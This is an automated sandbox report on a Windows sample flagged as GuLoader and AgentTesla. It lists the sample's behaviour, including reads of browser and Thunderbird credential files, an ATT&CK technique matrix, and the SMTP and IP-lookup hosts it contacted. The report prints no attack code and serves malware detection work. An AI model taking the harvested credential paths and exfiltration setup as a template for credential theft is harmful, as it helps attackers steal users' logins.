Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\REnBTVfW8q.exe

0_2_00403489

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2677888739.00000000251C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7048, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7048, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2677888739.00000000251C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7048, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	1 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
REnBTVfW8q.exe	42%	ReversingLabs	Win32.Trojan.Guloader
REnBTVfW8q.exe	100%	Avira	TR/Injector.uccww
REnBTVfW8q.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://crl.m;	0%	Avira URL Cloud	safe
http://www.skinstudio.netG	0%	Avira URL Cloud	safe
http://smtp.santonswitchgears.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	true	unknown
drive.google.com	142.250.185.238	true	false	high
drive.usercontent.google.com	216.58.206.65	true	false	high
api.ipify.org	104.26.13.205	true	false	high
ip-api.com	208.95.112.1	true	false	high
smtp.santonswitchgears.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org	msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://smtp.santonswitchgears.com	msiexec.exe, 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://us2.smtp.mailhostbox.com	msiexec.exe, 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1638881119.0000000005171000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000005.00000002.2665422405.00000000098EA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	msiexec.exe, 00000005.00000002.2677888739.0000000025181000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1641405594.00000000061D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.m;	powershell.exe, 00000002.00000002.1646767837.0000000008B23000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	msiexec.exe, 00000005.00000002.2665422405.0000000009947000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000005.00000003.1764587505.0000000009960000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1764500258.0000000009960000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	REnBTVfW8q.exe, 00000000.00000000.1406879585.000000000040A000.00000008.00000001.01000000.00000003.sdmp, REnBTVfW8q.exe, 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmp	false		high
https://api.ipify.org/t	msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1638881119.0000000005171000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2677888739.0000000025131000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.skinstudio.netG	REnBTVfW8q.exe, 00000000.00000000.1406900001.000000000044D000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1638881119.00000000052C6000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
216.58.206.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
208.91.199.223	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
142.250.185.238	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1549457
Start date and time:	2024-11-05 16:35:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	REnBTVfW8q.exe renamed because original name is a hash value
Original Sample Name:	5201c8e6b6fc7dab0c7877710df4ca1943b1f6c6d99e93bc0c21d79fa6ea9943.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/13@5/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 133 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1568 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: REnBTVfW8q.exe

Simulations

Behavior and APIs

Time	Type	Description
10:36:18	API Interceptor	40x Sleep call for process: powershell.exe modified
10:36:56	API Interceptor	549508x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	NOuxGNqQH7.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	IPx5gzPi7I.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	RDF987656789000.cmd.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	orden de compra_.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	2q8mDVUlgI.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	iu56HJ45NV.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
208.91.199.223	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO.exe	Get hash	malicious	AgentTesla	Browse
	Request for Quotation Plug Valve.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.RATX-gen.3768.11045.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	UPDATED FLOOR PLAN_3D.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
us2.smtp.mailhostbox.com	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Tax Invoice 103505.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	PO.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	Purchase_Order.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	Scanned.pdf.pif.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	Request for Quotation Plug Valve.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
ip-api.com	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	NOuxGNqQH7.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	IPx5gzPi7I.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RDF987656789000.cmd.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	orden de compra_.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2q8mDVUlgI.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	iu56HJ45NV.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
api.ipify.org	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	D6yz87XjgM.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2e	Get hash	malicious	Unknown	Browse	172.67.74.152
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	104.26.12.205
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	REVISED PO NO.8389.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	NIlfETZ9aE.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	YvY5omjy2a.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.97.3
	https://me-qr.com/f/tritonstone?hash=	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.133.135
	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	https://micheline.aceflavall.com/	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.21.20.47
	D6yz87XjgM.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	http://www.axa-assistance.co.uk	Get hash	malicious	Unknown	Browse	104.18.86.42
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	L#U043e#U0430der.exe	Get hash	malicious	LummaC	Browse	172.67.187.9
TUT-ASUS	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	NOuxGNqQH7.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	IPx5gzPi7I.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RDF987656789000.cmd.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	orden de compra_.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2q8mDVUlgI.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	iu56HJ45NV.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
PUBLIC-DOMAIN-REGISTRYUS	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	p4rsJEIb7k.exe	Get hash	malicious	FormBook	Browse	119.18.54.27
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	1364. 2024.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	Quote_220072.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	TT Copy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	24-17745.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	208.91.199.22
	H33UCslPzv.exe	Get hash	malicious	XWorm	Browse	103.53.40.62

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	D6yz87XjgM.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	http://www.axa-assistance.co.uk	Get hash	malicious	Unknown	Browse	104.26.13.205
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	QzX4KXBXPq.exe	Get hash	malicious	LummaC	Browse	104.26.13.205
	5jh97SOa7H.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.205
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	RFQABCO004806L____________________pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.13.205
	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
37f463bf4616ecd445d4a1937da06e19	kzTEwlPWa0.exe	Get hash	malicious	GuLoader	Browse	142.250.185.238 216.58.206.65
	ulf4JrCRk2.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.185.238 216.58.206.65
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.185.238 216.58.206.65
	LqtjSIsoCg.exe	Get hash	malicious	GuLoader	Browse	142.250.185.238 216.58.206.65
	EQ_AW24 New Order Request.xlx.exe	Get hash	malicious	GuLoader, StormKitty, XWorm	Browse	142.250.185.238 216.58.206.65
	5jh97SOa7H.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.185.238 216.58.206.65
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.185.238 216.58.206.65
	ImDbHt7AA4.exe	Get hash	malicious	DarkCloud	Browse	142.250.185.238 216.58.206.65
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.185.238 216.58.206.65
	HATCH COVER REQ_AW24 New Order Request.exe	Get hash	malicious	GuLoader	Browse	142.250.185.238 216.58.206.65

Process:	C:\Users\user\Desktop\REnBTVfW8q.exe
File Type:	ASCII text, with CRLF line terminators
